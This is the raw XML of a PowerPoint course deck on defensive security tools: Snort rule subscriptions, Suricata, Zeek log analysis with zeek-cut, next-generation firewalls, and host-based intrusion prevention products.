              <a:t>/open/snort-2.9.0/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Paid rules (~$1000/sensor/year)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now owned by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Proofpoint</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Industry Information Sharing and Analysis Centers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat feeds too!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat feeds – lists of malicious domains &amp; IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0" err="1"/>
              <a:t>Malwaredomains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ShadowNet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Paid for feeds from orgs &amp; vendors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ISACs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115795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56270-5194-B44D-A88D-9E71BA04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vs Prevention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55B283-88A5-CA4B-B07A-3C43321DD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784"/>
            <a:ext cx="8404713" cy="5765216"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31218549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F716F-2CBA-B741-B1BB-308B6A68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Oinkcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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887D0-0C9D-564D-9813-E7CF3932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Snort moved to requiring users to register to download rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>To get access you must supply an “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>Oinkcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Just an API key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14985958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Barnyard2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Interpreter for snort unified2 binary output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Allows snort to write to disk quickly = no missed packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Unified logging?  Both alerts and the packet data (for in depth analysis)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4802327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Suricata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Not quite a fork of Snort but pretty close</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Open Source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Compatible with most Snort rules </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7790178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More than the average IDS/IPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Takes incoming packet streams and converts into higher level events, then applies scripts to them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Real time alerts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Execute other programs on it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Log all the things</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Can add context to your traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://zeek.org/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https://try.zeek.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> – Web based “try it in your browser”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979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61643-F4EE-3647-9981-8F60E75F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 have an IPS?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F59C6-E4A3-D94D-8F2D-B2B2BAE6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True but IPS is looking for “known bad”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>Zeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> allows you to find the “unknown bad”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>A threat hunter’s dream tool</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23562285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Zeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -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b="1" dirty="0"/>
              <a:t>Event engine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>– Analyzes network traffic (live or in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> form) and generates events from that traffic. It uses common ports and protocol detection to interpret network traffic to decode it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>Policy scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>– These process the events from the engine and can take action on those events (send an alert, run a command, run another policy script, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>). They can also take in other input like threat intel lists to help process the events</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="835238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EBBF-FE77-1945-9C2D-A798C546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Zeek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8A49-04BF-334C-B43B-BB4C51637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Zeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> supports parsing of many application layer protocols (HTTP, SMTP, SSH, SSL, FTP, DNS,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Can analyze file contents sent over protocols including file hashing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logs output into ASCII for processing via syslog into any kind of log management tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SDKs for extending (C, Perl, Python, Ruby)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can fire off external scripts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103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C19F-35B5-CE41-8E5B-9AF93989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Zeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Scripts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7F8E66-412E-1841-BF0C-B86403E53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" y="2489200"/>
            <a:ext cx="9135408" cy="41973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524A4E-44FF-B74B-B62A-E7F16FCF74D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1417637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C-like</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="740523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FF59-8D07-064B-A8EB-328E22E93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Zeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -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72E69-034E-9F44-87CD-A4EF9E139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try.zeek.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sumstats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” exercise and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exercise_traffic.pcap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956B0-5FC2-8A4C-B57F-00167723A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500"/>
            <a:ext cx="9144000" cy="423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804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AF754-2F60-BE40-8EA0-28D81786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Zeek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8E15F-7147-5940-8B31-2A62CE5A5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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is processed the are a number of logs created for various protocols and activities that can be reviewed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2F695-1A36-5741-8373-B60414A6C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6260"/>
            <a:ext cx="9112815" cy="88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1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545C7-329F-084D-ABD5-62495E8F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08229-E403-A949-996A-F4F1F512A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Intrusion prevention devices can usually also set their rules to detection mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Why?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>In case a rule has known false positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>To test out before doing into production</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>As a stop gap to recover from an outage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55654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08F69-B0FE-D840-BB01-7D7C92CD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Zeek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B44FC-238B-C644-BACD-29C1FC00F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025650"/>
            <a:ext cx="7213600" cy="3949700"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19416277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8FC77-9E96-7A48-A25B-BCD532F3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Zeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – DNS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less –S </a:t>
            </a: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dns.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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3A1346-40DB-944F-8DD9-62BB5DE8A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" y="2520778"/>
            <a:ext cx="9124742" cy="2540496"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42143515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C4B4-628F-9446-8511-2A917517B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Zeek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12F0C3-7878-8140-A8AC-A1CBD0078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" y="2292350"/>
            <a:ext cx="7226300" cy="3416300"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34814894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23C36-A737-ED45-B30C-B87CACE85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zeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-cut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20DBD-3A8F-094A-A302-056B8AEB3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 provided to make it easier to process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Zeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> files into human readable formats as well as formats we can use common Unix tools for processing data (sed, awk, cut, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uniq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, sort,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dns.log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| /opt/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zeek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/bin/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zeek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-cut query answers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id.orig_h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| less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62D74-82CE-1741-B96C-C0B776513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3865562"/>
            <a:ext cx="6718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810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0E52D-C0A3-4145-A451-993CB4D8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Zeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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4B549-FE3A-674E-A5EB-8AF986C76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800" dirty="0"/>
              <a:t>Run through the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Zeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> Exercise for this week.</a:t>
            </a:r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r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>For later: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Zeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> has some pre-canned exercises you can try out online.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Zeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> online: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://try.zeek.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Exercises: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://old.zeek.org/documentation/tutorials/index.html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174588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Next-Gen FWs, Unified Threat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mgmt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Next-Gen Firewalls, Unified Threat Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Merging of firewalls, IPS, anti-malware, anti-spam, content filtering, data loss prevention, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>ONE BOX CAN DO IT ALL! (Maybe.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16645168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NGFW/UTM Market</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2015-06-24 at 4.14.4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892" r="-32892"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3609639" y="2200284"/>
            <a:ext cx="6667486" cy="4200516"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="gartner-fw-quad_2015_lg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8" y="2086378"/>
            <a:ext cx="4582637" cy="43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429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6B3B-27A1-DA4C-8837-7EE7771F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56441F-D8B9-E442-818E-6200B10E9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74638"/>
            <a:ext cx="6329363" cy="6329363"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30015146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Palo Alto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Market leader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Founded in 2005</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Benefits of NGFW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ID application regardless of port/protocol it’s using</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can ID users (with configuration) regardless of IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fast inline deployment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One inspection run of the traffic for firewalling, IPS, WAF, anti-malware, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21570891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Palo Alto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lo-alto-blog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762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32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IDS/IPS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Host-based (HIDS/HIPS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Network-based (NIDS/NIPS)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828880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ingle-pass-architectur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 b="59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031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Screen Shot 2016-06-29 at 9.26.30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38" b="-156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935930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 descr="Screen Shot 2016-06-30 at 1.36.4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14" r="-8014"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-414338" y="142874"/>
            <a:ext cx="10137322" cy="6386513"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24549290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 descr="Screen Shot 2016-06-30 at 1.29.4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754" b="-17754"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="100013" y="428625"/>
            <a:ext cx="8890000" cy="5600700"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22834178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 descr="Screen Shot 2016-06-30 at 1.31.4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7" r="-697"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="400050"/>
            <a:ext cx="9071429" cy="5715000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31058949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6-06-30 at 1.34.1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484" r="-56484"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-562526" y="10274"/>
            <a:ext cx="10160000" cy="6400800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35322834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6-06-30 at 1.34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19" r="-44619"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-580067" y="274638"/>
            <a:ext cx="9724067" cy="6126162"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2156508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Micro Deep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 based Intrusion Prevention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also does Firewalling, AV, File Integrity Monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very popular in cloud/virtual environments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28655959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Micro Deep Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2016-06-30 at 4.58.0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64" r="-20864"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-204788" y="1100136"/>
            <a:ext cx="8943976" cy="5634705"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33226143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Micro Deep Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2016-06-30 at 4.58.2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912" b="-24912"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="185737" y="1003301"/>
            <a:ext cx="8635495" cy="5440362"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33233147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7746</TotalTime>
  <Words>3512</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>496</Paragraphs>
  <Slides>109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4" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Cambria</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Adjacency</vt:lpstr>
      <vt:lpstr>Security Tools for Information Security</vt:lpstr>
      <vt:lpstr>https://twitter.com/baphometadata/status/960003927818276864 </vt:lpstr>
      <vt:lpstr>While we get started…</vt:lpstr>
      <vt:lpstr>Want More Experience With Linux?</vt:lpstr>
      <vt:lpstr>Defense in Depth</vt:lpstr>
      <vt:lpstr>Intrusion Detection &amp; Prevention</vt:lpstr>
      <vt:lpstr>Detection vs Prevention</vt:lpstr>
      <vt:lpstr>*</vt:lpstr>
      <vt:lpstr>Types of IDS/IPS</vt:lpstr>
      <vt:lpstr>More Types of Differentiation </vt:lpstr>
      <vt:lpstr>Host-based IDS/IPS</vt:lpstr>
      <vt:lpstr>OSSEC - Background</vt:lpstr>
      <vt:lpstr>OSSEC - Platforms</vt:lpstr>
      <vt:lpstr>OSSEC – Supported Log Formats</vt:lpstr>
      <vt:lpstr>OSSEC Rules</vt:lpstr>
      <vt:lpstr>OSSEC Decoders</vt:lpstr>
      <vt:lpstr>OSSEC Decoders – SSH ex</vt:lpstr>
      <vt:lpstr>OSSEC Exercise</vt:lpstr>
      <vt:lpstr>Sysmon</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Sysmon -  Command Options</vt:lpstr>
      <vt:lpstr>Sysmon - Events</vt:lpstr>
      <vt:lpstr>Sysmon – Sample Config</vt:lpstr>
      <vt:lpstr>Sysmon</vt:lpstr>
      <vt:lpstr>Sysmon – Swift on Security </vt:lpstr>
      <vt:lpstr>Sysmon – Swift on Security </vt:lpstr>
      <vt:lpstr>Sysmon – What to log?</vt:lpstr>
      <vt:lpstr>More on Sysmon</vt:lpstr>
      <vt:lpstr>What about NGAV?</vt:lpstr>
      <vt:lpstr>Network-based IPS</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Where to place on the network?</vt:lpstr>
      <vt:lpstr>Where to place on the network?</vt:lpstr>
      <vt:lpstr>Host-Based Pros</vt:lpstr>
      <vt:lpstr>Host-Based Cons</vt:lpstr>
      <vt:lpstr>Network-based Pros</vt:lpstr>
      <vt:lpstr>Network-based Cons</vt:lpstr>
      <vt:lpstr>IDS/IPS Challenges</vt:lpstr>
      <vt:lpstr>IDS/IPS Evasion</vt:lpstr>
      <vt:lpstr>Snort – History &amp; Intro</vt:lpstr>
      <vt:lpstr>Snort rules</vt:lpstr>
      <vt:lpstr>Snort - Rule Actions</vt:lpstr>
      <vt:lpstr>Snort - Protocols</vt:lpstr>
      <vt:lpstr>Snort – IP Addresses</vt:lpstr>
      <vt:lpstr>Snort – Direction Operated</vt:lpstr>
      <vt:lpstr>Snort - Rule Options</vt:lpstr>
      <vt:lpstr>Snort - Preprocessors</vt:lpstr>
      <vt:lpstr>Snort – Preprocessor examples</vt:lpstr>
      <vt:lpstr>A simple snort rule</vt:lpstr>
      <vt:lpstr>Snort content</vt:lpstr>
      <vt:lpstr>Snort – OpenSSL Heartbleed rule</vt:lpstr>
      <vt:lpstr>Snort – OpenSSL Heartbleed rule</vt:lpstr>
      <vt:lpstr>Snort – Official Heartbleed rule</vt:lpstr>
      <vt:lpstr>Rule Grouping and Rule Performance</vt:lpstr>
      <vt:lpstr>Rule Grouping and Rule Performance</vt:lpstr>
      <vt:lpstr>The Golden Rule</vt:lpstr>
      <vt:lpstr>Running Snort – Real time</vt:lpstr>
